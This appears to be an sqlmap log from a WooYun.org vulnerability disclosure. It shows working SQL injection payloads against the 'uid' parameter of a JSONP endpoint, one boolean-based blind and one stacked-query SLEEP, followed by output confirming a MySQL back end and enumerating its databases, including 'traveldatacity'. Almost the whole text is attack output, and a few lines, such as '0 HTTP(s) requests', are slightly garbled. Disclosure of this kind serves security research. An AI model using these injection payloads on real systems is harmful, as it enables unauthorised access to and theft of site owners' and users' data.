WooYun.org

[*] starting at 16:17:48
[16:17:48] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: t=jsonp&callback=12085&uid=1887467502 and 1=if((1=1 AND 6607=6607),1,(select 1 union select 2))
---
 requests:
---
Place: GET
Parameter: uid
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: t=jsonp&callback=12085&uid=1887467502; SELECT SLEEP(5)--
---
[16:17:48] [INFO] testing MySQL
[16:17:48] [INFO] confirming MySQL
[16:17:48] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[16:17:48] [INFO] fetching database names
[16:17:48] [INFO] fetching number of databases
[16:17:48] [INFO] retrieved: 3
[16:17:50] [INFO] retrieving the length of query output
[16:17:50] [INFO] retrieved: 18
[16:18:00] [INFO] retrieved: information_schema
[16:18:00] [INFO] retrieving the length of query output
[16:18:00] [INFO] retrieved: 4
[16:18:03] [INFO] retrieved: test
[16:18:03] [INFO] retrieving the length of query output
[16:18:03] [INFO] retrieved: 14
[16:18:11] [INFO] retrieved: traveldatacity
available databases [3]:
[*] information_schema
[*] test
[*] traveldatacity